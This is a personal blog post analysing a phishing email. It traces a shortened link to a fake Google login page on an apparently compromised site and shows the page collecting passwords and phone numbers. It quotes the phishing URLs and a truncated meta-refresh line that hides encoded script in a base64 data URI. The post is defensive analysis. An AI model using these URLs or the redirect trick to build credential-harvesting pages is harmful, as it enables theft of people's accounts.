Friday, February 12, 2016

Fishing Email

I got an email today which looks like a spam mail. However, Google didn't mark it as a spam, which they usually do. So, I took a small note on understand this email.

Email

Instead of using super attractive words, the content was saying that I have to logged in somewhere in order to get my mails back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure that I've never used any service from them. To talk more regarding to this, sometimes, we can't even fully trust that people won't send out spams from domains "look safe". That is, even if the domain is sent from someone we know, we still have to be careful.



External Link

Don't click on the link if we don't trust it at this point. Copy the link and read it in order to understand who's hosting the link. What I got is "http://ow.ly/YeNWT", which looks like a shorten URL hiding the real URL. Normal people rarely do this since there's no benefit in this case, also, it's always better to use URLs with the company's domain so that people can trust.



So, instead of using my original browser, which contains all my cookies of different websites. I used "Tor Browser" to keep myself safe.

Analysis The Site - Routing


After seeing the page on Tor Browser. It's almost 100% sure that this is a fishing site. However, in order to understand it more. We can track how its URL routing works using following information:

> wget http://ow.ly/YeNWT
--2016-02-12 14:17:58--  http://ow.ly/YeNWT
Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...
Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://hannahreade.co.uk/WT/orin.htm [following]
--2016-02-12 14:17:59--  http://hannahreade.co.uk/WT/orin.htm
Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7
Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102999 (101K) [text/html]
By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like a normal website, and if so, the site may be hacked.

Analysis The Site - Purpose

Like most fishing websites, the purpose of the sites is trying to get the user's accounts with passwords by faking the site. The site looks totally the same as Google login page; however nothing is actually the same besides its layout. We can learn this simply by reading the URL, or by typing wrong passwords and see what will happen.

In this case, I can login without typing a correct password. And, their second page is requesting my cell phone number. Of course, I can go onto next page by giving a reason cell number (even with a wrong phone number format). Then, the site gave me a blank page after I giving all these informations, which is the way the do usually. Therefore, the user may just got confused and ignored this without thinking too much, while the account username and password was sent to the attacker.



Analysis The Site - Code

It's pretty much so far; however, it is still nice if I can go through their code a little bit. After I did "wget" their fishing site. I got the raw file of its site. And, this is its second line:

<meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...

The site is redirected to another URL, "data:text/html;base64, ....", which isn't a hyperlink to another site but a site that contains itself in the URL as a raw string. And, by opening the URL in browser, the raw string will be parsed back to HTML format.

However, part of the code was an encoded JS code which hides the further information.



To find out the attacker, we can simply decode everything on the site, or we can monitoring the package transits between any external services and my laptop. However, I am not going into this now, and may continue this work another day.

Sum Up

Spam doesn't harm if you understand what's going on. In the case here, we can learn that we should:
  • check the sender's domain
  • open suspicious URL in Tor Browser
  • be ware of the URL
  • mark spams on your Gmail if you found one, which makes Google stop it spreading to other people